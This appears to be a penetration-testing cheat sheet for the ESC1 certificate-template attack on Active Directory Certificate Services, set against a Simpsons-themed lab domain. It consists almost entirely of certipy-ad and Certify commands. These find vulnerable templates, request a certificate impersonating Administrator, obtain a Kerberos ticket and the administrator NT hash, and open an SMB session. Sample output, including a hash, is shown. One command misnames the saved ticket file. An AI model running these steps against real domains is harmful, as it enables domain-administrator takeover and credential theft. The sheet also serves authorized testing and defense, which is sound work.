Technique

ESC1

 

1.0 certipy-ad

1.1 Find vulnerable ESC1 templates

Create the bloodhound dump and import:

certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -scheme ldap -old-bloodhound
 
certipy-ad find -u krustytheclown@thesimpsons.springfield.local -p krustytheclown -vulnerable -stdout

1.2 Certification request

In bloodhound, your will find the target group via shortest path:

certipy-ad req -username krustytheclown@thesimpsons.springfield.local -password krustytheclown -target-ip duffbrewery.springfield.local -ca 'SPRINGFIELD-CA' -template 'ESC1' -upn 'Administrator@springfield.local'

1.3 Authentication

certipy-ad auth -pfx administrator.pfx
 
[*] Using principal: administrator@springfield.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@springfield.local': aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e
 
export KRB5CCNAME=administrator.ccname
 
impacket-smbclient @duffbrewery.springfield.local -no-pass -k

2.0 Certify / Rubeus

2.1 Find vulnerable ESC1 template

certify cas
certify find

2.2 Certification request

certify request /template:!templatename /ca:!computername.!domain.local\!domain.local
 
certify request /ca:krustyland.ogdenville.local\\OGDENVILLE-CA /template:ESC1 /altname:krustyland /machine

References